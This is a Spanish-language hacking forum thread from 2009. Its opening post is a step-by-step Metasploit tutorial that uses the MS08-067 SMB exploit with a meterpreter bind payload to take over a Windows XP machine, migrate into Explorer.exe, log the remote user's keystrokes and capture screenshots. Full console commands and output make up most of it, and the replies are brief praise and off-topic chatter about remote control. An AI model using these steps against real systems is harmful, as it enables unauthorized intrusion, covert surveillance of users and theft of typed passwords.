elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Únete al Grupo Steam elhacker.NET


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking (Moderador: toxeek)
| | |-+  [Metasploit] Usar Keylogger del Metasploit
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: [Metasploit] Usar Keylogger del Metasploit  (Leído 17,996 veces)
Shell Root
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.724


<3


Ver Perfil WWW
[Metasploit] Usar Keylogger del Metasploit
« en: 23 Diciembre 2009, 20:14 pm »

Usar Keylogger del Metasploit
[Metasploit By: Shell Root]


Una de las muchas herramientas que trae integrada el Metasploit, es un Keylogger. Podemos capturar las teclas presionadas en el P.C Remoto, ademas de poder sacar un Screenshot. Aquí veremos el uso de esté servicio del Metasploit.

Primero ingresaremos a la P.C con el exploit:
    * exploit/windows/smb/ms08_067_netapi

y con el PAYLOAD:
    * windows/shell/bind_tcp
    * windows/shell/reverse_tcp

En este caso usaremos el PAYLOAD windows/shell/bind_tcp. No explicaré mucho porque para eso esta este POST de mi amigo Rcart.
http://foro.portalhacker.net/index.php/topic,93233.0.html

Código:
                __.                       .__.        .__. __.
  _____   _____/  |______    ____________ |  |   ____ |__|/  |_
 /     \_/ __ \   __\__  \  /  ___/\____ \|  |  /  _ \|  \   __\
|  Y Y  \  ___/|  |  / __ \_\___ \ |  |_> >  |_(  <_> )  ||  |
|__|_|  /\___  >__| (____  /____  >|   __/|____/\____/|__||__|
      \/     \/          \/     \/ |__|


       =[ metasploit v3.3.2-release [core:3.3 api:1.0]
+ -- --=[ 462 exploits - 219 auxiliary
+ -- --=[ 192 payloads - 22 encoders - 8 nops
       =[ svn r7808 updated 8 days ago (2009.12.10)

Warning: This copy of the Metasploit Framework was last updated 8 days ago.
         We recommend that you update the framework at least every other day.
         For information on updating your copy of Metasploit, please see:
             http://dev.metasploit.com/redmine/projects/framework/wiki/Updating

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 192.168.0.3
RHOST => 192.168.0.3
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > exploit

[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:Spanish
[*] Selected Target: Windows XP SP2 Spanish (NX)
[*] Triggering the vulnerability...
[*] Sending stage (723456 bytes)
[*] Meterpreter session 1 opened (192.168.0.2:4367 -> 192.168.0.3:4444)

meterpreter >

Ahora que estamos dentro del P.C remoto, miremos las optiones que tiene, con el comando Help

Código:
meterpreter > help

Core Commands
=============

    Command       Description
    -------       -----------
    ps            List running processes
    migrate       Migrate the server to another process
    use           Load a one or more meterpreter extensions


Stdapi: User interface Commands
===============================

    Command        Description
    -------        -----------
    keyscan_dump   Dump they keystroke buffer
    keyscan_start  Start capturing keystrokes
    keyscan_stop   Stop capturing keystrokes

meterpreter >
Nota: Solo mostraré las opciones que nos interesa.

Es la hora de iniciar nuestro keylogger, pero antes, mirelos los procesos que estan corriendo en la P.C Remota, con el comando ps
Código:
meterpreter > ps

Process list
============

    PID   Name          Path
    ---   ----          ----
    368   smss.exe      \SystemRoot\System32\smss.exe
    548   csrss.exe     \??\C:\WINDOWS\system32\csrss.exe
    576   winlogon.exe  \??\C:\WINDOWS\system32\winlogon.exe
    656   services.exe  C:\WINDOWS\system32\services.exe
    668   lsass.exe     C:\WINDOWS\system32\lsass.exe
    824   svchost.exe   C:\WINDOWS\system32\svchost.exe
    840   cmd.exe       C:\WINDOWS\system32\cmd.exe
    892   svchost.exe   C:\WINDOWS\system32\svchost.exe
    988   svchost.exe   C:\WINDOWS\System32\svchost.exe
    1040  svchost.exe   C:\WINDOWS\system32\svchost.exe
    1128  svchost.exe   C:\WINDOWS\system32\svchost.exe
    1384  wuauclt.exe   C:\WINDOWS\system32\wuauclt.exe
    1452  Explorer.EXE  C:\WINDOWS\Explorer.EXE
    1512  spoolsv.exe   C:\WINDOWS\system32\spoolsv.exe
    1684  alg.exe       C:\WINDOWS\System32\alg.exe
    1700  wscntfy.exe   C:\WINDOWS\system32\wscntfy.exe
    1800  ctfmon.exe    C:\WINDOWS\system32\ctfmon.exe
    1908  inetinfo.exe  C:\WINDOWS\system32\inetsrv\inetinfo.exe
    1936  metsvc.exe    C:\WINDOWS\TEMP\LsMhsBTb\metsvc.exe

meterpreter >

Ahora migremos al proceso Explorer.exe. Usaremos el comando Migrate [Numero_Proceso] . Miremos el PID del proceso Explorer.exe, es el numero 1452.
Código:
meterpreter > migrate 1452
[*] Migrating to 1452...
[*] Migration completed successfully.
meterpreter >

Ya es hora de que iniciaremos el Keylogger con el comando keyscan_start
Código:
meterpreter > keyscan_start
Starting the keystroke sniffer...
meterpreter >

Ahora con ayuda del comando keyscan_dump , veremos las teclas presionadas en la P.C Remota.
Código:
meterpreter > keyscan_dump 
Dumping captured keystrokes...
net user <Return>  <Ctrl>  <LCtrl>  <Alt>  <LMenu>
meterpreter >

Ahora miremos la opción de sacar un ScreenShot de la P.C Remota, para ello usaremos el plugin espia del metasploit.
Código:
meterpreter > use espia
Loading extension espia...success.
meterpreter >

Despues con el comando screenshot [Ruta_Archivo_Salida] sacaremos una captura de pantalla de la P.C Remota.
Código:
meterpreter > screenshot /Prueba.bmp
[*] Image saved to /Prueba.bmp
meterpreter >
Imagen:


Con esto damos por concluida el uso del Keylogger y lo pausamos con el comando keyscan_stop
Código:
meterpreter > keyscan_stop
Stopping the keystroke sniffer...
meterpreter >

By: Shell Root
Fuente: http://shellrootsecurity.blogspot.com/2009/12/usar-keylogger-del-metasploit.html
Video: http://www.youtube.com/watch?v=f8_M6V3xILE
En línea

Te vendería mi talento por poder dormir tranquilo.
Castg!
Wiki

Desconectado Desconectado

Mensajes: 1.191



Ver Perfil WWW
Re: [Metasploit] Usar Keylogger del Metasploit
« Respuesta #1 en: 24 Diciembre 2009, 01:53 am »

Perfectamente explicado, te felicito, cuando me llegue el ubutnu que lo pedi hace poco me lo instalo porq en esta verg de windwos no me funca, me recomendaron usarlo en linux, voy a probar todos los post que hiciste, que herramienta terrible, gracias y segui aportando asi ey!
En línea

nachitus

Desconectado Desconectado

Mensajes: 210


Ver Perfil
Re: [Metasploit] Usar Keylogger del Metasploit
« Respuesta #2 en: 24 Diciembre 2009, 06:41 am »


eyyy!!
hola a todos , Cestg perdona lei que pediste el UBUNtu a alguien? acaso hay alguna pagina como las del Solaris q te envian ubuntu, por favor decirmela,, para evitar el descargar tanto q mi pobre carro no puede con todo.......

gracias
En línea

Castg!
Wiki

Desconectado Desconectado

Mensajes: 1.191



Ver Perfil WWW
Re: [Metasploit] Usar Keylogger del Metasploit
« Respuesta #3 en: 24 Diciembre 2009, 07:00 am »

perdon, no quiero hacer spam. disculpen. nome di cuenta y ya se habia mandado elmensaje, te lo mando por mp amigo ;)
En línea

ruben_linux

Desconectado Desconectado

Mensajes: 138



Ver Perfil WWW
Re: [Metasploit] Usar Keylogger del Metasploit
« Respuesta #4 en: 23 Abril 2011, 18:11 pm »

otra herramienta interesante es:

 vnc

la probasteis, yo me he reido mucho, tomas el control del pc y puedes actuar en el pc remoto como si te sentaras delante.

 :laugh:
En línea

Edu


Desconectado Desconectado

Mensajes: 1.082


Ex XXX-ZERO-XXX


Ver Perfil
Re: [Metasploit] Usar Keylogger del Metasploit
« Respuesta #5 en: 23 Abril 2011, 20:59 pm »

Pero no tiene nada q ver con esto
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Aprende a usar Metasploit
Bugs y Exploits
cristoldo 3 5,736 Último mensaje 26 Agosto 2011, 02:39 am
por Milo_EscorpioNN
AYUDA CON METASPLOIT PRFAVOR
Hacking
manulxipi 0 2,898 Último mensaje 27 Julio 2012, 21:55 pm
por manulxipi
Sobre Keylogger con Metasploit y Kali Linux
Hacking
sebpes 1 5,870 Último mensaje 20 Febrero 2014, 13:57 pm
por akka
Metasploit con Android, sin opción keylogger?
Hacking
RichieTozier21 0 4,204 Último mensaje 2 Agosto 2016, 01:52 am
por RichieTozier21
Puedo usar metasploit en android sin usar linux?
Dudas Generales
Ckey 0 2,707 Último mensaje 11 Mayo 2017, 21:17 pm
por Ckey
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines